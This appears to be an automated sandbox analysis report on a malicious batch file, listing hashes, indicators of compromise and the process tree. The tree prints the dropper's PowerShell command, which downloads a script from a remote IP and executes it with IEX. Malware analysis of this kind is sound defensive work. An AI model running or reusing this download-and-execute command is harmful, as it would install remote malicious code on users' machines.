bf720acfb3a2f503222eae5a572791a0230dbf4ce5ed2c02b4f8dda85341c4a9

Analysis

Target

d3fe887fa5f2522fa18e5a7a4c7edeab.bat
Size

219B
MD5

095d4b51311078e00015480ea6d28ab4
SHA1

fc6cc3517edfddf916eb2275b9576d217c6a82b1
SHA256

bf720acfb3a2f503222eae5a572791a0230dbf4ce5ed2c02b4f8dda85341c4a9
SHA512

2a7f213d950e9321dfd88f62fc5c138667c09e337f672edfd8019e3fe78451c39f734399ae308177306f577f4e49730ef7b4bb69530c5e0732d992ab464fa45c

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d3fe887fa5f2522fa18e5a7a4c7edeab

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 1844	1624	cmd.exe	69
PID 1624 wrote to memory of 1844	1624	cmd.exe	69
PID 1624 wrote to memory of 1844	1624	cmd.exe	69

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2084	1844	WerFault.exe	69

Suspicious use of AdjustPrivilegeToken 3 IoCs

Suspicious behavior: EnumeratesProcesses 14 IoCs

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d3fe887fa5f2522fa18e5a7a4c7edeab.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d3fe887fa5f2522fa18e5a7a4c7edeab');Invoke-DWHAFNSROCWU;Start-Sleep -s 10000"
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 708
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    PID:2084

memory/2084-1-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/2084-8-0x0000000004D90000-0x0000000004D91000-memory.dmp

Filesize
4KB

Download